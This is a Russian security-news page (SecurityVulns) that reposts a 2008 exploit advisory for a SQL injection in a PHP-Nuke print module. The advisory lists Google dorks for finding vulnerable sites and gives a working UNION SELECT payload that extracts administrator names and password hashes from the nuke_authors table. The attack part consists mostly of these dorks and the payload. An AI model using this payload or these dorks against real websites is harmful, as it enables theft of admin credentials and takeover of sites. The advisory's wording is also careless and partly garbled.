Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  joomla SQL Injection(com_cms
)

  joomla SQL Injection(com_aso
rtyment)katid

  XOOPS Module prayerlist SQL Injection(cid)

  joomla SQL Injection(com_mos
t)secid

From:hackturkiye.hackturkiye_(at)_gmail.com <hackturkiye.hackturkiye_(at)_gmail.com>
Date:22 февраля 2008 г.
Subject:PHP-Nuke genaral print SQL Injection(id)

###############################################################
#
#   PHP-Nuke genaral print SQL Injection(id)
#
###############################################################
#
# AUTHOR : [email protected]
#
# HOME : http://www.milw0rm.com/author/1334
#   
# MAİL : [email protected]
#        
################################################################
#
#  DORK 1 : allinurl:"modules.php?name"print  
#
#  DORK 2 : allinurl:"modules.php?name=Hikaye"
#
#  DORK   : allinurl:"modules.php?name=Fikralar"
#
#  DORK   : allinurl:"modules.php?name=bilgi"
#
################################################################
  
 example

http://xxxx/modules.php?name=(xxx subject)&(subject)=exploit

you cant see print id on google becouse all system have secret print and this exploit working
simetimes but not always

 EXPLOIT :

print&id=-
9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,
aid,0x3a,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202


################################################################
# [email protected]           i AM NOT HACKER      [email protected]
################################################################

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород